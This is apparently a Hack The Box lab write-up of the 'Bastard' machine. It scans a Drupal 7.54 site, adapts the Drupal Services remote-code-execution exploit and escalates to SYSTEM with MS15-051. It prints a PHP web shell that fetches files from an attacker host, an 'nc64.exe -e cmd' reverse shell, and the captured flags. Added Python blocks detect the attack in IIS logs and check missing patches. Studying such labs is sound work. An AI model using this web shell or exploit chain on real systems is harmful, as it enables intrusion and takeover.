30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Bastard

Starting off with a port scan.

root@n0w4n:~/opt/htb/bastard# nmap -n -T4 -sS -sV -sC -oA nmap.bastard 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 21:30 CEST
Nmap scan report for 10.10.10.9
Host is up (0.023s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

Looks like a Drupal site with a well-stuffed robots.txt file. Also some RPC on an ephemeral port.

It probably runs on Windows Server 2008 R2.
Let’s start with a scan of the Drupal install.

root@n0w4n:~/opt/htb/bastard# python3 /root/opt/tools/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php,txt -x 403,404 --simple-report=bastard.dirsearch
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )
Extensions: php, txt | Threads: 10 | Wordlist size: 6344
Error Log: /root/opt/tools/dirsearch/logs/errors-18-06-28_08-35-01.log
Target: http://10.10.10.9/
[08:35:04] Starting:
[08:35:15] 400 -  324B  - /%ff/
[08:35:21] 200 -    8KB - /%3f/
[08:35:29] 200 -    7KB - /0
[08:55:12] 200 -  108KB - /CHANGELOG.txt
[08:55:12] 200 -  108KB - /ChangeLog.txt
[08:55:12] 200 -  108KB - /Changelog.txt
[08:55:12] 200 -  108KB - /changelog.txt
[08:55:12] 200 -  108KB - /CHANGELOG.TXT
[09:06:59] 301 -  150B  - /includes  ->  http://10.10.10.9/includes/
[09:07:18] 200 -    7KB - /index.php
[09:07:29] 200 -    7KB - /INDEX.PHP
[09:07:29] 200 -    7KB - /index.PHP
[09:08:00] 200 -    2KB - /INSTALL.mysql.txt
[09:08:00] 200 -    2KB - /install.mysql.txt
[09:08:00] 200 -    2KB - /INSTALL.pgsql.txt
[09:08:00] 200 -    2KB - /install.pgsql.txt
[09:08:02] 200 -   18KB - /INSTALL.txt
[09:08:02] 200 -   18KB - /Install.txt
[09:08:02] 200 -   18KB - /install.txt
[09:08:02] 200 -   18KB - /INSTALL.TXT
[09:08:03] 200 -    3KB - /install.php
[09:10:01] 200 -   18KB - /LICENSE.txt
[09:10:01] 200 -   18KB - /License.txt
[09:10:01] 200 -   18KB - /license.txt
[09:12:11] 200 -    9KB - /MAINTAINERS.txt
[09:13:38] 301 -  146B  - /misc  ->  http://10.10.10.9/misc/
[09:13:58] 301 -  149B  - /modules  ->  http://10.10.10.9/modules/
[09:15:29] 200 -    7KB - /node
[09:20:59] 301 -  150B  - /profiles  ->  http://10.10.10.9/profiles/
[09:21:48] 200 -    5KB - /README.txt
[09:21:48] 200 -    5KB - /Readme.txt
[09:21:48] 200 -    5KB - /readme.txt
[09:22:21] 200 -   62B  - /rest/
[09:22:27] 200 -    2KB - /robots.txt
[09:22:57] 301 -  149B  - /scripts  ->  http://10.10.10.9/scripts/
[09:22:57] 301 -  149B  - /Scripts  ->  http://10.10.10.9/Scripts/
[09:25:22] 301 -  147B  - /sites  ->  http://10.10.10.9/sites/
[09:29:40] 301 -  148B  - /themes  ->  http://10.10.10.9/themes/
[09:30:56] 200 -   10KB - /UPGRADE.txt
[09:31:29] 200 -    7KB - /user
[09:31:31] 200 -    7KB - /user/
[09:31:34] 200 -    7KB - /user/login/
[09:34:30] 200 -   42B  - /xmlrpc.php
Task Completed
root@n0w4n:~/opt/htb/bastard# droopescan scan drupal -u http://10.10.10.9/ -t 8
[+] Plugins found:
    ctools http://10.10.10.9/sites/all/modules/ctools/
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/ctools/changelog.txt
        http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
        http://10.10.10.9/sites/all/modules/ctools/API.txt
    libraries http://10.10.10.9/sites/all/modules/libraries/
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
        http://10.10.10.9/sites/all/modules/libraries/changelog.txt
        http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
        http://10.10.10.9/sites/all/modules/libraries/README.txt
        http://10.10.10.9/sites/all/modules/libraries/readme.txt
        http://10.10.10.9/sites/all/modules/libraries/README.TXT
        http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
    services http://10.10.10.9/sites/all/modules/services/
        http://10.10.10.9/sites/all/modules/services/README.txt
        http://10.10.10.9/sites/all/modules/services/readme.txt
        http://10.10.10.9/sites/all/modules/services/README.TXT
        http://10.10.10.9/sites/all/modules/services/LICENSE.txt
    image http://10.10.10.9/modules/image/
    profile http://10.10.10.9/modules/profile/
    php http://10.10.10.9/modules/php/
[+] Themes found:
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/
[+] Possible version(s):
    7.54
[+] Possible interesting urls found:
    Default changelog file - http://10.10.10.9/CHANGELOG.txt
    Default admin - http://10.10.10.9/user/login
[+] Scan finished (0:44:25.844837 elapsed)

The version of Drupal is 7.54 so let’s check searchsploit for possible exploits.

root@n0w4n:~/opt/htb/bastard# searchsploit drupal 7
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                                                                               | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                                                                             | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                                                                         | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                                                                          | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                                                                               | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                                                                               | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                                                                                  | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                                                                                    | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                                                                        | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                                                                                   | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                                                                             | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                                                                         | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)                                                                                                    | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'drupalgeddon3' Authenticated Remote Code Execution (PoC)                                                                                                 | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                       | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                                    | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                             | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                                                                                   | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                                                                            | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities                                                              | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                                         | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                                         | exploits/php/webapps/44501.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

No exploit lists version 7.54 directly, but several cover either 7.x or versions below 7.58. The < 7.58 ones are Ruby scripts and the 7.x Services one is a PHP script. Let’s go for that one first.

$url = 'http://vmweb.lan/drupal-7.54';

Looking inside the script, it turns out this exploit was written for version 7.54 after all (and it probably works with other 7.x versions too).
I’ll change the URL and the payload (just because I prefer a reverse shell). For the payload I use the pentestmonkey reverse PHP shell, modified a bit to work on Windows.
Then I adjust the PHP script:

$fileRead = fopen("n0w4n.txt", "r") or die("No such file!");
$shell = fread($fileRead, filesize("n0w4n.txt"));
$url = '10.10.10.9';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
    'filename' => 'n0w4n.php',
    'data' => $shell
];

When running the script I get a lot of errors:

PHP Parse error:  syntax error, unexpected 'error_reporting' (T_STRING) in /root/opt/htb/bastard/41564.php on line 24
PHP Parse error: syntax error, unexpected 'us' (T_STRING), expecting function (T_FUNCTION) or const (T_CONST) in /root/opt/htb/bastard/41564.php on line 70

Looking at the script again, there are a number of line breaks inside some of the comments, which cause these errors.

PHP Fatal error:  Uncaught Error: Call to undefined function curl_init() in /root/opt/htb/bastard/41564.php:254
Stack trace:
#0 /root/opt/htb/bastard/41564.php(104): Browser->post('application/vnd...', 'a:2:{s:8:"usern...')
#1 {main}
  thrown in /root/opt/htb/bastard/41564.php on line 254

Again an error. This time it’s because I don’t have php-curl installed.

# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Failed to login with fake password

After installing the correct package the PHP script runs, but it stops at a login failure. Why? When you drive a web application from the browser you can intercept the traffic with a proxy like Burp.
Here I want to intercept the traffic generated from the CLI, so I set up a proxy and run everything through it. For this I use Burp.


With Burp listening as a proxy on 127.0.0.1:9999, it intercepts all traffic sent through it. Now to change the URL inside the PHP script so that everything goes through Burp.

POST /rest_endpoint/user/login HTTP/1.1
Host: 127.0.0.1:9999
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 885
Connection: close

Looking at the request, the URI differs from what the dirsearch scan found at the beginning: the endpoint is not ‘rest_endpoint’ but just ‘rest’. Adjust the script and change the IP address back.

root@n0w4n:~/opt/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/n0w4n.php

Looks like the script ran just fine now.
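The endpoint discovery and the file write above are exactly what a defender would want to spot in the web server's logs. The following Python, added here and not part of the original post or the exploit script, correlates POSTs to the Services module's <endpoint>/user/login resource with later requests for non-core PHP files at the web root; the IIS W3C log lines it runs over are constructed, using the lab addresses from the post.

```python
"""Spot the Drupal Services REST abuse pattern in IIS W3C logs.

Added example, not from the original post. It looks for POSTs to the Services
module's <endpoint>/user/login resource (the "/rest" endpoint found above) and,
shortly afterwards from the same client, a request for a PHP file at the web
root that is not one of Drupal 7's core scripts. The log lines are constructed;
the IPs are the lab addresses from the post.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Drupal 7 core PHP files that legitimately sit at the web root (the same set
# as in the directory listing later in the post). Any other top-level .php is
# worth a look.
DRUPAL7_CORE_PHP = {
    "/authorize.php", "/cron.php", "/index.php",
    "/install.php", "/update.php", "/xmlrpc.php",
}

# Constructed IIS 7.5 W3C log excerpt with the default field set.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2018-06-29 07:44:50 10.10.10.9 GET /index.php - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 31
2018-06-29 07:45:01 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.2 - 401 0 0 15
2018-06-29 07:45:02 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.2 - 200 0 0 93
2018-06-29 07:45:03 10.10.10.9 GET /n0w4n.php fexec=whoami 80 - 10.10.14.2 - 200 0 0 120
2018-06-29 07:50:00 10.10.10.9 GET /xmlrpc.php - 80 - 10.10.14.3 Mozilla/5.0 200 0 0 5
"""

def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by field name."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split()
            if len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows

def is_services_login(row):
    # POST to <endpoint>/user/login; the bare /user/login is Drupal's normal
    # login form and is excluded. Status is ignored on purpose: the exploit run
    # above was rejected ("Failed to login with fake password") yet still did
    # its work, so a 401 here is no reason to drop the request.
    stem = row["cs-uri-stem"].lower()
    return (row["cs-method"] == "POST" and stem.endswith("/user/login")
            and stem != "/user/login")

def is_unexpected_php(row):
    # A top-level .php that is not part of Drupal 7 core, served with 200.
    stem = row["cs-uri-stem"].lower()
    return (stem.endswith(".php") and stem.count("/") == 1
            and stem not in DRUPAL7_CORE_PHP and row["sc-status"] == "200")

def _ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def find_suspects(rows, window=timedelta(minutes=10)):
    """Return (client, php path, time) for unexpected PHP hits that follow a
    Services login POST from the same client within `window`."""
    logins, hits = defaultdict(list), []
    for r in rows:  # rows are assumed to be in time order
        t, ip = _ts(r), r["c-ip"]
        if is_services_login(r):
            logins[ip].append(t)
        elif is_unexpected_php(r):
            if any(t - window <= lt <= t for lt in logins[ip]):
                hits.append((ip, r["cs-uri-stem"], t.isoformat()))
    return hits

if __name__ == "__main__":
    for hit in find_suspects(parse_w3c(SAMPLE_LOG)):
        print("suspect:", hit)
```

The Content-Type the exploit sends (application/vnd.php.serialized, visible in the Burp capture above) is not in default IIS logs; where a reverse proxy or WAF records request headers, that header is a second, more direct signal.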

root@n0w4n:~/opt/privesc/shells/php# nc -lvnp 31337
listening on [any] 31337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.9] 58877
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\>

Even with the adjustments, the shell is not working properly: cmd starts, but no command gets a response. Let’s try again with another command, systeminfo:

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46
System Boot Time:          25/6/2018, 4:31:57
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
                           [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.048 MB
Available Physical Memory: 1.566 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.599 MB
Virtual Memory: In Use:    496 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
iis apppool\drupal

I got systeminfo and whoami, but again no further interaction; the shell just freezes up. I could repeat the same process over and over to get the flag, but that would really get on my nerves, so I need another way in.
I have tried different msfvenom payloads as well as other PHP payloads from the internet with the same result, so I looked up other ways to exploit the vulnerability, and one was shown by IppSec.

$phpCode = <<<'EOD'
<?php
    if (isset($_REQUEST['fupload'])) {
        file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.2:8000/" . $_REQUEST['fupload']));
    }
    if (isset($_REQUEST['fexec'])) {
        echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
    }
?>
EOD;

This piece of PHP replaces the payload in the exploit script and gives two parameters: fupload fetches a file from my web server and writes it on the remote machine, and fexec runs a command there and returns its output.

 Directory of C:\inetpub\drupal-7.54
28/06/2018  12:42 μμ    <DIR>          .
28/06/2018  12:42 μμ    <DIR>          ..
19/03/2017  01:42 μμ               317 .editorconfig
19/03/2017  01:42 μμ               174 .gitignore
19/03/2017  01:42 μμ             5.969 .htaccess
19/03/2017  01:42 μμ             6.604 authorize.php
19/03/2017  01:42 μμ           110.781 CHANGELOG.txt
19/03/2017  01:42 μμ             1.481 COPYRIGHT.txt
19/03/2017  01:42 μμ               720 cron.php
19/03/2017  01:43 μμ    <DIR>          includes
19/03/2017  01:42 μμ               529 index.php
19/03/2017  01:42 μμ             1.717 INSTALL.mysql.txt
19/03/2017  01:42 μμ             1.874 INSTALL.pgsql.txt
19/03/2017  01:42 μμ               703 install.php
19/03/2017  01:42 μμ             1.298 INSTALL.sqlite.txt
19/03/2017  01:42 μμ            17.995 INSTALL.txt
19/03/2017  01:42 μμ            18.092 LICENSE.txt
19/03/2017  01:42 μμ             8.710 MAINTAINERS.txt
19/03/2017  01:43 μμ    <DIR>          misc
19/03/2017  01:43 μμ    <DIR>          modules
29/06/2018  10:45 πμ               291 n0w4n.php
19/03/2017  01:43 μμ    <DIR>          profiles
19/03/2017  01:42 μμ             5.382 README.txt
19/03/2017  01:42 μμ             2.189 robots.txt
19/03/2017  01:43 μμ    <DIR>          scripts
28/06/2018  12:26 μμ                48 shell.php
19/03/2017  01:43 μμ    <DIR>          sites
19/03/2017  01:43 μμ    <DIR>          themes
19/03/2017  01:42 μμ            19.986 update.php
19/03/2017  01:42 μμ            10.123 UPGRADE.txt
19/03/2017  01:42 μμ             2.200 web.config
19/03/2017  01:42 μμ               417 xmlrpc.php
              23 File(s)        217.600 bytes
               9 Dir(s)  30.802.579.456 bytes free

And it works. Nice. Let’s see if this way is more stable.
It is, so at the moment I have a reliable way of enumerating this machine, but I still only have a low-privileged account. Let’s grab the systeminfo output and run it through windows-exploit-suggester.

root@n0w4n:~/opt/htb/bastard# python windows-exploit-suggester.py -d 2018-06-30-mssb.xls -i systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Some possible exploits. While searching the internet for useful scripts, I found a site that lists scripts for Windows kernel exploits, including one I didn’t know:
a PowerShell script called Sherlock from rasta-mouse. So let’s try that one as well.

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Not Vulnerable
Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

This script checks for newer vulnerabilities, and it shows three possibilities: MS10-092, MS15-051 and MS16-032 appear vulnerable. The first one exploits the Task Scheduler 2.0 XML 0day that was used by Stuxnet. The third one uses a race condition, which can be a hassle. The second one exploits improper object handling in the win32k.sys kernel-mode driver and has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. So I’ll go for that one, because I know the build of this machine matches this exploit perfectly.
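Both suggesters above work from the Hotfix(s) block that systeminfo prints, which on this box is empty. The following Python, added here and not from the original post, windows-exploit-suggester or Sherlock, does the defender's version of the same check: it parses that block and reports which KBs from a baseline are missing. The baseline uses KB3045171 (the MS15-051 patch, the number that appears in the exploit path later in the post); the second host sample and its KB9999999 entry are constructed.

```python
"""Patch-state check from `systeminfo` output.

Added example, not part of the original post, windows-exploit-suggester or
Sherlock. It parses the Hotfix(s) block that `systeminfo` prints and reports
which KBs from a required list are missing. KB3045171 (the MS15-051 fix) is
taken from the post; the second sample and its KB9999999 entry are constructed.
"""
import re

# Bulletin -> KB we expect to see installed. Only KB3045171 comes from the post;
# extend this with your own baseline.
REQUIRED = {"MS15-051": "KB3045171"}

KB_RE = re.compile(r"\bKB\d{6,7}\b", re.I)

# Excerpt of the systeminfo output shown above (no hotfixes at all).
SAMPLE_UNPATCHED = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed output for a host with two updates installed.
SAMPLE_PATCHED = """\
Host Name:                 EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3045171
                           [02]: KB9999999
"""

def parse_systeminfo(text):
    """Map each 'Key: value' line to a list of values; indented continuation
    lines (the [01]: ... entries) are appended to the preceding key."""
    info, key = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = re.match(r"^(\S[^:]*?):\s*(.*)$", raw)
        if m and not raw.startswith(" "):
            key = m.group(1).strip()
            value = m.group(2).strip()
            info[key] = [value] if value else []
        elif key is not None:
            info[key].append(raw.strip())
    return info

def installed_hotfixes(info):
    """KB numbers listed under Hotfix(s); 'N/A' yields an empty set."""
    kbs = set()
    for item in info.get("Hotfix(s)", []):
        kbs.update(k.upper() for k in KB_RE.findall(item))
    return kbs

def missing_patches(info, required=REQUIRED):
    have = installed_hotfixes(info)
    return sorted(b for b, kb in required.items() if kb.upper() not in have)

def summarize(text, required=REQUIRED):
    info = parse_systeminfo(text)
    return {
        "os": info.get("OS Name", ["?"])[0],
        "version": info.get("OS Version", ["?"])[0],
        "hotfixes": sorted(installed_hotfixes(info)),
        "missing": missing_patches(info, required),
    }

if __name__ == "__main__":
    for name, text in (("bastard", SAMPLE_UNPATCHED), ("constructed", SAMPLE_PATCHED)):
        print(name, summarize(text))
```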

root@n0w4n:~/opt/htb/bastard# cp /root/opt/privesc/Windows/windows-kernel-exploits/MS15-051/MS15-051-KB3045171/ms15-051x64.exe .
10.10.10.9/n0w4n.php?fupload=ms15-051x64.exe

After uploading it I run the file.

C:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1748 created.
==============================
nt authority\system

Now to get the flags.

C:\inetpub\drupal-7.54>ms15-051x64.exe "C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.2 6666"
ms15-051x64.exe "C:\inetpub\drupal-7.54\nc64.exe -e cmd 10.10.14.2 6666"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1456 created.
==============================
root@n0w4n:~/opt/htb/bastard# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.9] 49192
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
C:\Users\dimitris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA
 Directory of C:\Users\dimitris\Desktop
19/03/2017  09:04    <DIR>          .
19/03/2017  09:04    <DIR>          ..
19/03/2017  09:06                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.817.583.104 bytes free
C:\Users\dimitris\Desktop>type user.txt
type user.txt
ba22fde1932d06eb76a163d312f921a2

That’s one.

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA
 Directory of C:\Users\Administrator\Desktop
19/03/2017  08:33    <DIR>          .
19/03/2017  08:33    <DIR>          ..
19/03/2017  08:34                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.817.583.104 bytes free
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c

And that’s two.